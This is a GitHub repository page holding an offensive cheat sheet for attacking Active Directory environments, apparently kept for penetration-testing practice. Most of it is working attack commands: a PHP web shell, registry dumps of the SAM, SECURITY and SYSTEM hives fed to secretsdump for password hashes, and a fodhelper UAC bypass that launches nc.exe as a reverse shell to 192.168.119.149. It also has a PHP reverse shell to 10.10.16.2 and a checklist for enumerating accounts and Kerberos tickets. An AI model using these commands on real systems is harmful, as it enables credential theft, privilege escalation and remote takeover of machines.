Skip to content

A collection of notes for exploiting and abusing Active Directory environments.

Notifications You must be signed in to change notification settings

glowbase/active-directory-abuse-notes

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 

Repository files navigation

Active Directory Abuse

A collection of notes for exploiting and abusing Active Directory environments.

What have you got?

Quick Brain Dump

  • Try RPC null authentication (enumdomusers, querydispfinfo)
  • List SMB shares
  • LDAP password attributes (ldapsearch)
  • GetUserSPNs
  • GetNPUsers
  • Check SMB after finding credentials (crackmapexec)
  • Bloodhound = Lord and Saviour
  • Check Program Files
  • Check Services using PowerUp.ps1

Other Quick Commands

<?php system($_GET['cmd']); ?>
reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save
impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL -outputfile hashes/hashes

PowerView enumeration for interesting rights on domain object

Import-Module PowerView.ps1
Invoke-ACLScanner

UAC Bypass

BUILTIN\Administrators
Mandatory Label\Medium Mandatory Level
%SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe -ep bypass

REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command  
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v
DelegateExecute /t
REG_SZ REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "C:\Users\someone\Desktop\nc.exe 192.168.119.149 9001 -e cmd.exe" /f

fodhelper.exe

PHP Shell

<?php $sock=fsockopen("10.10.16.2",9002);$proc=proc_open("bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>

About

A collection of notes for exploiting and abusing Active Directory environments.

Resources

Stars

Watchers

Forks